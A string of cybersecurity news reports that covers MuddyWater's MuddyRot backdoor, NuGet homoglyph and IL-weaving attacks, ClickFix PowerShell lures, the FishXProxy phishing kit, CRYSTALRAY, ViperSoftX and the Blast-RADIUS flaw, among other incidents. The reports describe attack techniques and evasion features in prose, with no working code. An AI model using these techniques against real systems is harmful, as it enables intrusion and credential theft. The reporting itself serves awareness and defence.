Researchers from Sekoia observed that the new MuddyRot malware is distributed through malicious PDF files and relies on public exploits to compromise internet-exposed servers, such as Exchange or SharePoint servers, moving laterally within the entire network after successful compromise. After this stage, the threat actors sent spear phishing emails from compromised email accounts to bypass security measures and increase the appearance of legitimacy in the recipient’s eyes. [caption id="attachment_82047" align="alignnone" width="1311"] Source: blog.sekoia.io[/caption] MuddyRot is a sophisticated malware that uses a combination of obfuscation and encryption to evade detection from security tools. Upon execution, the malware de-obfuscates strings, loads necessary functions, and creates a 'mutex' (lock-in program that prevents simultaneous access from other processes) to establish exclusive control over the program. It also uses dynamic import loading to reduce the potential digital footprint. [caption id="attachment_82050" align="alignnone" width="1551"] Source: blog.sekoia.io[/caption] The malware establishes persistence on the infected host by creating a scheduled task and copying itself to a system directory. It then communicates with its command and control (C2) server over a raw TCP socket. The MuddyRot malware supports various commands, including file upload and download, reverse shell, and process kill. The reverse shell capability allows the operator to connect to the victim host and execute commands remotely, capturing the results in real-time. The malware's C2 communication is obfuscated, using a fixed subtraction value to decode the incoming inputs and add three bytes to the output. The developer of this backdoor added the "terminate" command to stop the reverse shell. The MuddyRot backdoor implant is capable of executing the following commands: [caption id="attachment_82061" align="alignnone" width="1658"] Source: blog.sekoia.io[/caption] These commands are communicated with C2 servers over the TCP port 443, along with further obfuscation to avoid detection.

Shifting Tactics

The MuddyWater group altered its infection strategy from relying on off-the-shelf software remote monitoring tools such as Atera and SimpleHelp to the custom-built MuddyRot implant. While the exact reasons for this switch are unknown, the researchers speculate that the change could be due to the the increased scrutiny of these tools by security vendors, with the attackers possibly running into difficulties during deployment of the Atera tool on targets. These difficulties may have prompted the group to switch to something more custom. The researchers note the departure in the MuddyWater's group's recent campaigns from their traditional infection chain to the use of well-known exploits and distribution of spear phishing emails with PDF files embedded with links to load the MuddyRot validator. This new tactic allows the malware to evade detection and increases its chances of successful infection. The researchers have shared potential indicators of compromise (IOCs) over GitHub to protect against MuddyRot's deployment. Other cybersecurity firms such as Check Point and ClearSky recently conducted their own investigations into the new malware campaign from the Iranian threat actor.

The Philippine Department of Migrant Workers (DMW) has taken swift action to protect the personal data of overseas Filipino workers (OFWs) after a ransomware attack prompted the agency to shut down its online systems. While the attack may have caused inconvenience, the DMW has activated new protocols to cater to the daily transaction needs of OFWs to ensure that their information remains safe and secure.

Manual Processing at Department of Migrant Workers Offices

In a statement on Tuesday, the DMW said OFW data remains secure despite the cyber incident. The agency took its Management Information Technology System offline as a precautionary measure to protect worker information. To minimize disruption from the attack, the DMW activated manual processing of Overseas Employment Certificates and OFW passes at its national and regional offices, one-stop shops, and Migrant Workers Assistance Centers. The DMW stated, “As a result of a ransomware attack on DMW online systems, the Department through its Management Information Technology System had to take pre-emptive measures to protect OFW data and information, such as taking the systems offline. OFWs can visit these locations to obtain necessary documents while online systems are unavailable. The DMW has also established an email-based system for OFWs requiring access to information sheets. Rather than physically visiting DMW offices, workers can send requests to infosheet@dmw.gov.ph. The agency will then email QR-coded information sheets directly to the requesting OFW. Alternatively, OFWs can submit requests via the DMW's Facebook page Messenger. By taking these measures, the DMW said it is ensuring that OFWs can continue to access the services they need while it works to restore its systems online. The agency is also coordinating with the Bureau of Immigration and airport authorities to facilitate the smooth departure of OFWs. The DMW has apologized for any inconvenience caused by the attack and is working to restore its online systems and implement stronger measures to protect the information of OFWs. In a statement on social media, the DMW said, "Rest assured, DMW databases containing OFW data were not affected by the attack, and that the DMW is currently working with the Department of Information and Communications Technology to restore online systems and ensure continued protection of the data and information of OFWs."

Philippines Cyber Attacks

The Philippines has observed an increased number of cyber attacks in recent times, prompting a call for increased government measures to strengthen the nation’s digital infrastructure to reduce such campaigns. A recent bill - House Bill 8199 - would implement the Department of Information and Communications Technology to bolster the Philippine National Cyber Security Plan, or NCSP. Rep. Brian Raymund Yamsuan pushed for approval within the House of Representatives for the new bill earlier this year. He stated, “This measure complements the NCSP and is a good jump-off point in accomplishing one of its primary objectives, which is to ensure convergence among all government agencies in protecting our country from cyber attacks.” Brian offered support for reports that the Philippines President Marcos, U.S. President Joe Biden and Japan Prime Minister Fumio Kishida were establishing joint plans to establish a cyber defense framework during an earlier trilateral summit. Several government agencies have also discussed measures to bolster their cybersecurity capabilities, including a unified system for setting up minimum security standards, monitoring of systems, and detection and mitigation of threats.

The Central Bureau of Investigation (CBI) of India has uncovered a large-scale human trafficking operation that has ensnared thousands of Indians in Southeast Asian countries to work in Chinese scam centers. According to a first information report(FIR) filed by the agency, victims are being forced to work as cyber criminals in these operations. Rajesh Kumar, CEO of the Indian Cyber Crime Coordination Centre, revealed that an average of 7,000 cyber-related complaints are registered daily with the National Cybercrime Reporting Portal. Most of these frauds originate in Cambodia, Myanmar and Laos.

Trafficking Scheme of Chinese Scam Centers

According to a recent report from The Indian Express, victims of these campaigns are lured in with promises of lucrative jobs in foreign countries such as Dubai and Bangkok, only to be trafficked to Southeast Asian countries. Once they arrive, they are forced to work in call centers or "casinos" where they are trained to scam people from around the world. One such victim, Saddam Sheikh from Maharashtra's Palghar district, was contacted via WhatsApp about a job opportunity in Thailand. After paying 140,000 rupees (approximately $1,700) for a visa, Sheikh was sent to Bangkok and then to Laos. He was forced to scam people in India, Canada and the United States by promoting fraudulent cryptocurrency investments online. Sheikh eventually managed to escape and return to India. Similar cases have been reported in other parts of Southeast Asia. Martha Praveen, who fled a scam operation in Cambodia, claimed he was among 5,000 Indians working in a call center run by Chinese gangs. Praveen was initially offered a job in Azerbaijan but was instead sent to Cambodia. Upon arrival, his passport was confiscated, and he was taken to a large office complex housing multiple call centers disguised as casinos.

Government Response and Investigation

The CBI filed its case after consulting with the home ministry, telecom ministry and Reserve Bank of India. These institutions were tasked with identifying and addressing vulnerabilities in the banking and telecom sectors that enable such scams. The Telangana Cyber Security Bureau has also filed a similar report based on Praveen's complaint. The victims were reportedly involved in scamming people by offering fraudulent trading, investment and job opportunities, primarily targeting Indians, Europeans and Turkish nationals. As investigations continue, authorities are working to dismantle these criminal networks and prevent further exploitation of Indian citizens. The scale of the operation highlights the need for increased vigilance and cooperation between international law enforcement agencies to combat human trafficking and cyber crime. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A sophisticated malware campaign targeting the NuGet package manager has been uncovered by  researchers. The ongoing attack, which began in August 2023, has evolved to employ advanced techniques like homoglyphs and IL weaving to evade detection and fool developers. NuGet is a Microsoft-supported mechanism for sharing to allow developers to create, share, and consume .NET (including .NET Core code. The threat actors have refined their methods over time, moving from simple initialization scripts to more complex approaches to impersonate protected NuGet prefixes to inject malicious code into legitimate .NET binaries.

Homoglyph Attacks Bypass Security Measures

Researchers from ReversingLabs observed, that in a a clever twist, attackers had exploited NuGet's support for homoglyphs to circumvent the platform's prefix reservation system. By using visually identical but technically distinct characters, they created package names that appeared legitimate but weren't subject to the usual restrictions. [caption id="attachment_81691" align="alignnone" width="2772"] Source: www.reversinglabs.com[/caption] One of the most notable techniques used in this campaign is the use of homoglyphs, unique characters that look identical but have different digital identifiers. The attackers used homoglyphs to create a package that convincingly mimics those that use the reserved "Guna" prefix, a security feature of NuGet. For example, the malicious package "Gսոa.UI3.Wіnfօrms" used Armenian and Cyrillic characters to mimic the  "Guna" prefix, allowed the attackers to publish packages that looked official but contained malicious code. The campaign's latest phase employs IL weaving, a technique that modifies compiled .NET binaries. Attackers patch legitimate DLL files to include malicious module initializers, which execute when the module is first loaded. This approach makes detection more challenging, as the malicious code is embedded within otherwise legitimate binaries. The injected code typically functions as a downloader, retrieving additional malware from attacker-controlled servers. [caption id="attachment_81693" align="alignnone" width="900"] Source: www.reversinglabs.com[/caption] Researchers identified approximately 60 packages and 290 versions involved in this campaign. While the affected packages have been removed from NuGet, the evolving nature of the attack underscores the need for heightened vigilance in the software supply chain.

Evolved Tactics

The threat actors behind this campaign have continually refined their tactics, evolving from exploiting NuGet's MSBuild integrations to using simple, obfuscated downloaders inserted into legitimate PE binary files via IL weaving. This technique allows them to add malicious functionality to compiled .NET binaries, making it harder to detect. The detection of these malicious packages is challenging due to the use of homoglyphs and IL weaving. Traditional detection methods, such as YARA, may not be effective in identifying these threats. However, behavioral analysis can help identify suspicious packages and indicators of compromise. This latest campaign highlights the importance of staying ahead of malicious actors and their evolving tactics. The use of homoglyphs and IL weaving demonstrates the creativity and determination of attackers to deceive developers and security teams. It is crucial for development organizations to prioritize software supply chain security and stay informed about emerging threats. Researchers have shared potential Indicators of Compromise (IOCs) for this campaign to NuGet administrators, with identified packages removed from the platform. It is essential for developers to remain vigilant and report any suspicious packages to ensure the security of the software supply chain.

A sophisticated malvertising campaign is targeting Mac users searching for Microsoft Teams, highlighting the growing competition among malware creators in the macOS ecosystem. This latest attack, which uses Atomic Stealer malware, which follows closely on the heels of the Poseidon (OSX.RodStealer) project, indicates growing advancements in threats affecting macOS.

Deceptive Microsoft Teams for macOS Ad Campaign

The malicious ad campaign, which ran for several days, employed advanced filtering techniques to evade detection. Appearing as a top search result for Microsoft Teams, the ad displayed microsoft.com as its URL but actually redirected users through a series of deceptive links. The ad was likely paid for by a compromised Google ad account. Initially, the ad redirected straight to Microsoft's website, but after multiple attempts and tweaks, a full attack chain was finally observed. [caption id="attachment_81644" align="alignnone" width="970"] Source: malwarebytes.com[/caption] Researchers from Malwarebytes stated that upon clicking the ad, users were subjected to a profiling process to ensure only actual people proceeded. This could help the malicious site evade detection from automated security tools and scans. A cloaking domain then separated the initial redirect from the malicious landing page, which mimicked the design of the official Microsoft Teams download site. The ad was found to be malicious, with a display URL showing Microsoft.com, but actually leading to a fake installation page. The advertiser, located in Hong Kong, runs over a thousand unrelated ads. Upon further investigation, it was discovered that the ad was using a unique payload for each visitor, generated from a domain called locallyhyped.com. [caption id="attachment_81645" align="alignnone" width="1164"] Source: malwarebytes.com[/caption] Once the downloaded file was opened, the user was instructed to enter their password and grant access to the file system, allowing the malicious application to steal keychain passwords and important files. Following data theft, the data was exfiltrated via a single POST request to a remote attacker-controlled web server.

Mitigations for macOS Devices

To avoid falling victim to such attacks, researchers advised caution while downloading applications via search engines. Malvertising and SEO poisoning attacks can have devastating consequences, and it's crucial to use browser protection tools with the ability to block ads and malicious websites. Additionally, it's recommended to regularly update antivirus software and use a reputable ad blocker to minimize the risk of malware infection. [caption id="attachment_81655" align="alignnone" width="752"] Source: Cyble[/caption] This campaign underscores the increasing sophistication of macOS malware due to the keen interest demonstrated by threat actors in compromising the operating system's environment. Last year, researchers from Cyble Research and Intelligence Labs (CRIL) observed that the Atomic Stealer used in this campaign, had been offered via Telegram at the price of $1000 USD per month.

Australian authorities have charged a Russian-born couple with espionage in a operation referred to as 'Operation BURGAZADA', which the first use of new anti-espionage laws introduced in 2018. Kira Korolev, 40, a private in the Australian Army, and her husband Igor Korolev, 62, a laborer, face allegations of stealing sensitive Defense Force material for Russian intelligence. The couple, who arrived in Australia a decade ago and became citizens in recent years, appeared before a Brisbane magistrate on Friday. They could face up to 15 years in prison if convicted. The case has raised questions about the screening process for military recruits and the ongoing threat of foreign espionage.

Operation BURGAZADA Investigation

The AFP's investigation into the couple's activities is ongoing, with authorities seeking to determine whether the information was handed over to Russian authorities. Australian Security Intelligence Organisation (ASIO) director-general Mike Burgess has warned foreign spies that "when we can support a prosecution, we will support a prosecution. [caption id="attachment_81624" align="alignnone" width="1324"] Press-conference in relation to the investigation (Source: spaces.hightail.com)[/caption] Barrister Dylan Kerr, a commissioner from the Australian Federal Police, filed an application for the suppression of five names related to the case for national security reasons. The Defence Force has responded to these allegations by cancelling the couple's access to defence bases and systems. Court documents reveal that Kira Korolev is accused of providing unlawful access to defense computer systems, copying and disseminating information, and maintaining relationships with Russian Federation intelligence services. The alleged activities date back to December 2022 and continued until their arrest on July 11, 2024. Australian Federal Police Commissioner Reece Kershaw said Kira Korolev, an information systems technician with a security clearance, allegedly traveled to Russia in 2023 while on leave. During this time, she reportedly instructed her husband on accessing defense systems using her work account from their Brisbane home. A caretaker of the apartment block where the couple resided, Blake Fraser, stated that he had not noticed any suspicious activity from the couple. He stated, “I kept my eye out for anything unusual, but honestly, even being here on-site, I never saw anything.” He said that he only received his first hint that something was off when the apartment had received a request from ASIO and the AFP to access its F block, later being greeted by police cars and officers who arrived to arrest the couple. “I certainly wouldn’t think that in my lifetime something like this would have happened,” Fraser exclaimed.

Official Response and Implications

The arrests resulted from a joint operation involving the Australian Security Intelligence Organisation (ASIO) and the Australian Federal Police. ASIO Director-General Mike Burgess stated that the Defense Force's security awareness allowed early intervention and control of the operation. Authorities are investigating whether Kira Korolev joined the Defense Force with the intention of committing espionage or if the couple had been recruited more recently into Russian intelligence. The case has prompted a review of vetting procedures for military personnel, especially those born overseas. While officials claim no significant security compromise has been identified, the incident highlights the ongoing challenges of countering foreign espionage. Mike Burgess, Director-General of the Australian Security Intelligence Organisation encouraged potential Russian spies to defect and share secrets, using the famous example of the 1954 Petrov defections, where  Soviet spies who posed as Russian diplomats had defected to Australia. Burgess stated, “If you want to share your secrets, please reach out”. [caption id="attachment_81629" align="alignnone" width="980"] Vladimir Petrov and Evdokia Petrov who defected to Australia in 1954 (Source:www.naa.gov.au)[/caption] The Federal Police Commissioner Kershaw stated that no other individuals had been identified so far in the investigation, while investigators are also working to assess if the couple had established any rapport with any Russian diplomats based in Australia. Court documents allege the couple maintained a relationship with members or affiliates of Russian intelligence services for the purpose of providing the information. Kershaw expressed confidence in the counter-intelligence capability of the Australian government and the Five Eyes. He stated:

“Our Five Eyes partners and the Australian government can be confident that the robust partnerships within the Counter Foreign Interference Taskforce mean we will continue to identify and disrupt espionage and foreign interference activity.”

Prime Minister Anthony Albanese emphasized that any individuals interfering with Australia's national interests will be held accountable.

Researchers have discovered a new have a new weapon on the dark web markets: FishXProxy, a sophisticated phishing toolkit that's making waves in the underground hacking community. This powerful software package enables even novice attackers to create convincing phishing campaigns, potentially putting countless internet users at risk. FishXProxy bills itself as "The Ultimate Powerful Phishing Toolkit," and while its creators claim it's for educational purposes only, its features cater to malicious use. The kit provides an end-to-end solution for creating and managing phishing sites, focusing on evading detection and maximizing credential theft success rates.

FishXProxy Phishing Kit

At the heart of the new FishXProxy phishing kit is its multi-layered antibot system. These layers prevent automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit. [caption id="attachment_81577" align="alignnone" width="646"] Source: slashnext.com/[/caption] Options within the toolkit range from simple challenges, uniquely generated links, dynamic attachments, and even the use of Cloudflare's CAPTCHA system as antibot implementations. Researchers from SlashNext state that the kit's deep integration with Cloudflare provides phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes using Cloudflare Workers, SSL certificates, and DNS management, raising the bar for detection and takedown efforts. [caption id="attachment_81588" align="alignnone" width="547"] Source: slashnext.com[/caption] FishXProxy implements a cookie-based tracking system that allows attackers to identify and follow users across different phishing projects or campaigns. This enables more targeted and persistent attacks, as well as the ability to build detailed profiles of potential victims. These tools help attackers manage their campaigns more effectively while making it harder for security teams to analyze and shut down malicious infrastructure. The kit provides several end-to-end functionalities to maximize the potency of phishing campaigns, some of these key features include:

• Advanced antibot system: This multi-layered system prevents automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit. The antibot system offers several configuration options, including a Lite Challenge, Cloudflare Turnstile, IP/CAPTCHA Antibot, and Off option.
• Cloudflare integration: FishXProxy leverages Cloudflare's infrastructure to provide phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes Cloudflare Workers, Cloudflare Turnstile, SSL Certificates, and DNS Management.
• Inbuilt redirector: This feature allows attackers to hide the true destination of links, distribute incoming traffic across multiple phishing pages or servers, and implement more complex traffic flows to evade detection.
• Page expiration settings: This feature allows attackers to automatically restrict access to phishing content after a specified duration, limiting exposure, creating urgency, and aiding campaign management.
• Cross-project user tracking: This feature allows attackers to identify and track users across different phishing projects or campaigns, enabling them to tailor phishing content based on previous interactions and avoid targeting the same user multiple times.

Impact of Phishing Kits on Cyber Ecosystem

The rise of FishXProxy and other phishing toolkits has significant implications for cybersecurity. These toolkits lower the technical barriers to conducting phishing campaigns, making it easier for less skilled individuals to conduct advanced phishing operations. This has the potential to increase the volume and sophistication of phishing attacks in the wild. These toolkits typically offer the following functionalities as implementations, that would be harder to develop from scratch:

• Automated installation and setup
• Built-in traffic encryption
• Free and automated SSL certificate provisioning
• Unlimited subdomain and random domain generation
• Browser security bypass techniques
• Real-time monitoring and notifications via Telegram
• Comprehensive traffic analysis tools

The FishXProxy additionally offers 'lifetime updates + support,' treating the sale of the toolkit as a long-term service provision rather than a one-off attack or single sale bid. To combat these threats, companies should invest in advanced, multi-layered security solutions that offer real-time threat detection across email, web, and mobile channels. Organizations should also prioritize employee education on the latest phishing tactics and implement strong authentication measures to protect against credential theft attempts.

Researchers have uncovered a malware delivery method dubbed "ClickFix," which exploits user trust through compromised websites to deliver DakGate and Lumma Stealer malware variants. The ClickFix technique uses social engineering to trick users into executing malicious scripts, potentially leading to severe system compromise of affected systems. These sites redirect visitors to domains hosting fake popup windows, which instruct users to paste a script into a PowerShell terminal.

ClickFix Social Engineering Infection Chain

After visitors are redirected from seemingly-legitimate sites, instructions are displayed to deceive them into pasting various base64-encoded commands into a PowerShell terminal. Researchers from McAfee Labs stated that these commands are designed to download and execute malware, from remote attacker-controlled C2 servers. [caption id="attachment_81515" align="aligncenter" width="471"] Prevalence over past three months (Source: mcafee.com)[/caption] The ClickFix social engineering technique showcases a highly effective and technical method for malware deployment. Once the malware is active on the system, the malware typically includes steps to evade security detections such as clearing clipboard contents and running processes on minimized windows, maintain persistence on victim's systems, and stealing users’ personal data to send to a command and control (C2) server. The researchers have detailed the use of the ClickFix technique by the DarkGate and Lumma Stealer malware:

• DarkGate DarkGate is a malware family that relies on the ClickFix technique. The DarkGate malware is distributed through phishing emails that contain HTML attachments masqueraded as MS Office Word document files. After a user accesses the attachment, the HTML file displays a "How to fix" button, that upon clicking displays base64-encoded commands which hide malicious PowerShell instructions. [caption id="attachment_81519" align="aligncenter" width="626"] Source: mcafee.com[/caption] Upon running, the PowerShell commands downloads and executes an additional HTA file that contains additional malicious payloads. Once infected, the malware is capable of exfiltrating sensitive information and providing unauthorized remote access to threat actors.
• Lumma Stealer [caption id="attachment_81520" align="aligncenter" width="581"] Source: mcafee.com[/caption] While the Lumma Stealer is distributed through similar use of the ClickFix technique, visitors are usually greeted directly with a webpage displaying error message such as supposed browser problems, and are apparently provided instructions to 'fix' the issue. These instructions trick users to similarly enter base64-encoded commands into a PowerShell terminal that run the Lumma Stealer malware upon execution. This allows the stealer to bypass traditional security measures while compromising affected systems.

Mitigations and Remediations

To protect against the ClickFix technique and malware such as DarkGate and Lumma stealer, the researchers have shared the following recommendations:

• Regular training to inform potential victims about about social engineering tactics or phishing campaigns.
• Use of antivirus software on system endpoints.
• Implementation of a robust email or website filtering system to block suspicious phishing mails, malicious attachments or malicious websites.
• Deployment of firewalls and intrusion detection/prevention systems (IDS/IPS) to block against  malicious traffic on networks.
• Network segmentation to prevent the spread of malware within organizations.
• Monitoring of network logs and traffic
• Enforcement of the principle of least privilege (PoLP).
• Implementation of security policies or monitoring over clipboard content, particularly in sensitive environments.
• Implementation of multi-factor authentication (MFA).
• Update operating systems, software, and applications to the latest available patched versions.
• Encrypt stored data or data in transmission from potential unauthorized access.
• Regular and secure back up of important data

Vyacheslav Igorevich Penchukov, a Ukrainian hacker known as "Tank" has been sentenced to two concurrent 9-year prison terms by a U.S. federal court in Lincoln, Nebraska. for his role in a prolific cybercrime gang that stole tens of millions of dollars from small businesses. The 38 year-old individual, pleaded guilty to two charges of conspiracy to participate in racketeering and conspiracy to commit wire fraud. Judge John M. Gerrard sentenced also ordered him to pay more than $73 million in restitution and forfeited funds for these crimes.

'Tank' and JabberZeus Crew

Penchukov admitted to leading the Jabber Zeus hacking group, which used sophisticated malware to steal bank account information from small U.S. and European businesses. The group's operations, which began in 2009, resulted in tens of millions of dollars in losses. The FBI had been pursuing Penchukov for over a decade, and his capture in Switzerland in 2022 brought an end to his criminal spree. While leading the Jabber Zeus hacking cew, 'Tank' used the Zeus malware to infect computers and steal bank account information. He also organized the IcedID malware, which collected financial details and allowed ransomware to be deployed on systems. Investigators found a spreadsheet detailing the $19.9 million income IcedID made in 2021. The University of Vermont Medical Center was among the prominent victims of the IcedID malware, losing of over $30 million in the attack and rendering many of the critical patient services within the the institute as unavailable for more than two weeks. Penchukov had been charged in association with the attack by the law enforcement of the Eastern District of North Carolina. In response to the incident, U.S. Attorney Michael Easley for the Eastern District of North Carolina stated, “Malware like IcedID bleeds billions from the American economy and puts our critical infrastructure and national security at risk.” Last September, Dr. Stephen Leffler, President of the University of Vermont Medical Center had testified to the House of Representatives that the center was unable to access its own medical records for 28 days due to the incident. Dr. Leffler stated, “We didn’t have internet.” He added. "We didn’t have phones. It impacted radiology imaging, laboratory results." According to Dr. Leffler's testimony, the medical center's staff had rushed to purchase walkie-talkies to keep services running. Penchukov appeared on the FBI's most wanted cyber list for over a decade as the recognized leader of the cybercrime gang. Earlier, prosecutors had stated in court, “The defendant played a crucial role, a leadership role, in this scheme by directing and coordinating the exchange of stolen banking credentials and money mules." Jim Craig, a former FBI special agent who led the 2009 investigation into the Zeus cybercriminal group, expressed satisfaction with the outcome. Craig stated, "I never thought that we would ever see any of Jabber Zeus crew face justice in the U.S." Besides his involvement in cybercrime, Penchukov had also been identified as a popular DJ, who operated within Ukraine under the moniker of 'DJ Slava Rich.'

Implications of Ruling

The prosecution of Penchukov represents a significant milestone in the fight against high-value cybercrime targets and the persistence of law enforcements against international jurisdictional challenges. The Western law enforcement authorities are known to face challenges in prosecuting Eastern European cybercriminals, particularly those operating out of Russia or Ukraine, which do not have official extradition agreements with the US government. Craig pointed out, "The significance of him being caught is important to show that law enforcement is not going to stop—wherever they go, there's going to be a chance and opportunity for them to get caught." The case also raises questions about potential cooperation between Penchukov and authorities to aid ongoing cybercrime investigations, according to court documents both Penchukov's own lawyer and the US government requested less severe sentences after he had pleaded guilty to two charges of conspiring to participate in racketeering and commitment of wire fraud. Several charges were dropped against Penchukov following his signing of a plea agreement of which the details are publicly unknown.

A threat actor group dubbed 'CRYSTALRAY' has dramatically scaled up its attack operations, targeting over 1,500 victims worldwide with a sophisticated arsenal of open-source security tools. Researchers first observed the group's activities in in February 2024 and have been observing its evolving tactics. The group's primary goals appear to be credential theft, cryptomining and maintaining persistent long-term access to compromised systems. The group's tactics reflect a concerning trend of weaponization of legitimate open-source security tools by threat actor groups for malicious intent and illicit  financial gain.

CRYSTALRAY Reconnaissance and Initial Access

Researchers from Sysdig observed that the group had significantly scaled up its operations, to target over targeting over 1,500 victims with the abuse of a wide range of legitimate open-source security tools to exploit known vulnerabilities and deploy backdoors. CRYSTALRAY's attack chain begins with careful reconnaissance of potential victims, the group uses tools from ProjectDiscovery, an open-source organization, to identify targets. CRYSTALRAY's arsenal of tools includes zmap, asn, httpx, nuclei, platypus, and SSH-Snake. To gain initial access, the group often modifies existing proof-of-concept exploits for known vulnerabilities, testing them before deployment against real-world targets. These operations tend to focus on specific countries, with the United States and China accounting for over half of their observed victims. [caption id="attachment_81431" align="alignnone" width="1999"] Chart of targeted countries (Source: sysdig.com)[/caption] The attackers employ a tool called "ASN" to generate lists of specific IP addresses for targeted countries. They then use "zmap," a network scanner, to probe these IPs for vulnerabilities ripe for exploit in commonly-used platforms such as Confluence, Weblogic and ActiveMQ. The httpx module is used to verify the presence of vulnerable running services with a httpx_output.txt file generated to filter invalid results. Nuclei is then used to perform vulnerability scans, identifying CVEs such as CVE-2022-44877 (Arbitrary command execution flaw), CVE-2021-3129(Another Arbitrary code execution flaw), and CVE-2019-18394 (Server-side request forgery).

Lateral Movement, Data Theft and Crypto-Mining

After breaching a system, CRYSTALRAY focuses on lateral movement and data collection. A key tool in their arsenal is SSH-Snake, an open-source worm that spreads through networks using stolen SSH credentials. [caption id="attachment_81432" align="alignnone" width="1999"] Source: sysdig.com[/caption] The group moves beyond server access and compromise, to search for credentials such as passwords or API keys of popular cloud providers stored as environment variables in files such as .env configurations, potentially allowing them to expand their reach into victims' cloud infrastructure. The group automates the SSH-Snake tool to extract and exfiltrate credential data back to attacker-ownerd command-and-control servers. Ultimately, the group deploys cryptominers on breached systems by hijacking the host's processing power, with a script killing any existing cryptominers to maximize profit. While the researchers traced these deployed mining workers to a specific pool and discovered they were making roughly $200/month, starting in April, the group switched to a new configuration, making it impossible for the researchers to determine its current revenue. Researchers have offered the following recommendations to protect against these attacks:

•  Reduce potential cloud attack surface through secure vulnerability, identity, and secrets management to prevent automated attacks.
• Organizations required to expose applications to the public Internet, may face additional vulnerabilities and therefore should  prioritize vulnerability remediation to reduce their risk of exposure
•  Cameras/runtime detections that enable organizations to detect successful attacks and take immediate remediate action, allowing for in-depth forensic analysis to determine root cause of attacks.

The scale and sophistication of CRYSTALRAY's operations highlight the growing threat posed by cybercriminals leveraging open-source security tools.

Researchers have observed improvements in the ViperSoftX info-stealing malware that had been first spotted in 2020. The malware has moved toward employing more sophisticated evasion tactics, refined through the incorporation of the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts distributed through pirated eBook copies. This clever trick allows the malware to blend in with legitimate system activities, making it harder for security solutions to spot.

ViperSoftX Distributed as Trojan Horse in eBooks

[caption id="attachment_81267" align="alignnone" width="1932"] Source: www.trellix.com[/caption] ViperSoftX spreads through torrent sites, masquerading as eBooks. The infection chain of ViperSoftX begins when users access the downloaded RAR archive that includes a hidden folder, a deceptive shortcut file  that appears to be a harmless PDF or eBook along with a PowerShell script, AutoIt.exe, and AutoIt script that pose as simple JPG image files. [caption id="attachment_81268" align="alignnone" width="1200"] Source: www.trellix.com[/caption] When the user clicks on the shortcut file, it initiates a command sequence that begins by listing the contents of "zz1Cover4.jpg". Subsequently, it reads each line from this file in which commands are cleverly hidden within blank spaces, to a Powershell Command Prompt, effectively automating the execution of multiple commands. The researchers from Trellix state that the PowerShell code performs several actions, including unhiding the hidden folder, calculating the total size of all disk drives, and configuring Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in, effectively setting up persistence mechanisms on infected systems. The malware also copies two files to the %APPDATA%MicrosoftWindows directory, renaming one of them to .au3 and the other to AutoIt3.exe.

Increasing ViperSoftX Sophistication

The malware's use of CLR to run PowerShell within AutoIt is particularly sneaky. AutoIt, typically used for automating Windows tasks, is often trusted by security software. By piggybacking on this trust, ViperSoftX can fly under the radar. The malware employs additional tricks up its sleeve in the form of heavy obfuscation, deception and encryption to hide its true nature. ViperSoftX uses heavy Base64 obfuscation and AES encryption to hide the commands in the PowerShell scripts extracted from the image decoy files. This level of obfuscation challenges both researchers and analysis tools, making it even more difficult to decipher the malware's functionality and intent. The malware even attempts to modify the Antimalware Scan Interface (AMSI) to bypass security checks run against its scripts. By leveraging existing scripts, the malware developers accelerate development and focus on improving their evasion tactics, Analysis of the malware's network activity demonstrates attempts to blend traffic with legitimate system activity. Researchers observed the use of deceptive hostnames such as security-microsoft[.]com by the malware to appear more trustworthy and deceive victims into associating the traffic activity with with Microsoft. Analysis of a suspicious Base64-encoded User-Agent string, revealed detailed amount of system information extracted through PowerShell command execution from infected systems including logical disk volume serial number, computer name, username, operating system version, antivirus product information, and cryptocurrency details. The researchers warn against the increasing sophistication in ViperSoftX's operations as its ability to execute malicious functions while evading traditional security measures makes it a formidable opponent.

A critical vulnerability in the widely used RADIUS authentication protocol could allow attackers to gain unauthorized access to networks and devices, researchers have discovered. The flaw, dubbed "Blast-RADIUS," affects a protocol that has functioned as a cornerstone of modern network infrastructure. RADIUS, which stands for Remote Authentication Dial-In User Service, is used by nearly every switch, router, access point and VPN concentrator sold in the last 20 years. It verifies user credentials for remote access to networked devices. including network routers and switches, industrial control systems, VPNs, ISPs using DSL or FTTH, 2G and 3G cellular roaming, and 5G DNN authentication

The Blast-RADIUS Attack

Researchers from several universities along with some private firms discovered that a man-in-the-middle attacker could exploit a weakness in how the RADIUS protocol authenticates server responses. By injecting malicious data into a legitimate authentication request, an attacker can forge a valid "Access-Accept" message in response to a failed login attempt. [caption id="attachment_81227" align="alignnone" width="2391"] Source: blastradius.fail[/caption] This allows the attacker to transform a reject into an accept, and assign themselves arbitrary network privileges. The attack is made by the abuse of the MD5 hash function, which has been known to be vulnerable to chosen-prefix collisions. The attacker can use this collision to create a modified Response Authenticator that matches the authentic one generated by the server, without requiring any knowledge of the shared secret between the client and server. [caption id="attachment_81242" align="alignnone" width="1977"] Source: blastradius.fail[/caption] While MD5 hash collisions have been known since 2004, the researchers state that their attack technique is much more complex than older forms of MD5 collision attacks. Further, MD5 collision was not previously thought of as a possible way to exploit the RADIUS protocol. The new attack technique requires the use of the internet, with the attacker having to compute for the chosen-prefix MD5 collision attack in a matter of mere minutes or seconds. The researchers state that the best previously reported chosen-prefix collision attack typically took hours of operation to produce, collisions that were not found to be compatible with the RADIUS protocol. The researchers' Blast-RADIUS attack technique incorporates several improvements in speed, space, and scaling ahead of existing MD5 attacks, demonstrating that they can occur in shorter intervals to compromise the popular RADIUS protocol. While the proof-of-concept attacks described in the paper took about 3 to 6 minutes for MD5 chosen-prefix hash collision computation, longer than the 30- to 60-second timeouts commonly used in practice for RADIUS, each step of the new collision algorithm parallelizes rather well and allows for further hardware optimization. The researchers expect that a well-resourced attacker could obtain computational processing times tens or hundreds of times faster by running the attack on better GPUs, FPGAs, or other optimal hardware. The Blast-RADIUS attack technique affects all known RADIUS implementations that use non-EAP authentication methods over UDP, including the common FreeRADIUS implementation. The researchers disclosed details of the vulnerability to the IETF (Internet Engineering Task Force) and CERT( Computer Emergency Readiness Team) and expect patches for mitigations in the Message-Authenticator specifications from major implementations of the RADIUS protocol.

